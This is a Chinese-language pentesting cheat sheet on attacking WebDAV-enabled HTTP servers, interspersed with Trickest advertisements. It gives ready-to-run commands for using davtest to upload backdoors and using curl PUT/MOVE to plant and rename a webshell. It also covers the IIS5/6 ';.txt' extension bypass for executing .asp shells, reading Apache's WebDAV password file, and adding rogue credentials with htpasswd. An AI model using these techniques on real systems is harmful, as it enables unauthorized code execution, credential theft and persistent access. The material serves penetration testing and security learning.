WebDav

使用Trickest来轻松构建和自动化工作流，使用世界上最先进的社区工具。 立即获取访问权限：

当处理启用了WebDav的HTTP服务器时，如果具有正确的凭据（通常通过HTTP基本身份验证验证），则可以操纵文件。控制这样的服务器通常涉及上传和执行Webshell。

访问WebDav服务器通常需要有效的凭据，使用WebDav暴力破解是获取凭据的常见方法。

为了克服文件上传的限制，特别是阻止服务器端脚本执行的限制，您可以：

• 直接上传具有可执行扩展名的文件，如果没有受限制。

• 将已上传的非可执行文件（如.txt）重命名为可执行扩展名。

• 复制已上传的非可执行文件，将其扩展名更改为可执行的扩展名。

DavTest

Davtest尝试上传具有不同扩展名的多个文件，并检查是否执行了扩展名：

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

Cadaver

您可以使用此工具连接到 WebDav 服务器并手动执行操作（如上传、移动或删除）。

cadaver <IP>

PUT 请求

PUT 请求用于向服务器上传文件。PUT 请求可以通过 WebDAV 协议来执行，允许用户在服务器上创建、修改或替换文件。PUT 请求在进行 Web 应用程序渗透测试时经常用到，因为它可以帮助测试人员上传恶意文件或者利用服务器上的漏洞。

curl -T 'shell.txt' 'http://$ip'

MOVE 请求

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

使用Trickest 可以轻松构建和自动化工作流，使用世界上最先进的社区工具。 立即获取访问权限：

IIS5/6 WebDav漏洞

这个漏洞非常有趣。WebDav 不允许上传或重命名扩展名为**.asp的文件。但是你可以通过在文件名末尾添加";.txt"来绕过这个限制，文件将被执行为一个 .asp 文件（你也可以使用".html"代替".txt"，但不要忘记";"**）。

然后，你可以将你的shell上传为一个".txt"文件，并将其复制/移动为一个".asp;.txt"文件。通过web服务器访问该文件，它将被执行（cadaver会说移动操作失败，但实际上是成功的）。

提交凭据

如果Webdav正在使用Apache服务器，你应该查看Apache中配置的站点。通常在： /etc/apache2/sites-enabled/000-default

在其中你可能会找到类似以下内容：

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

正如您所看到的，这里有包含WebDAV服务器有效凭证的文件：

/etc/apache2/users.password

在这类文件中，您会找到用户名和密码的哈希值。这些是WebDAV服务器用来验证用户身份的凭据。

您可以尝试破解它们，或者如果出于某种原因您想要访问WebDAV服务器，也可以添加更多凭据：

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

要检查新凭据是否有效，您可以执行以下操作：

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

参考资料

• https://vk9-sec.com/exploiting-webdav/

使用Trickest可以轻松构建和自动化工作流程，利用世界上最先进的社区工具。 立即获取访问权限：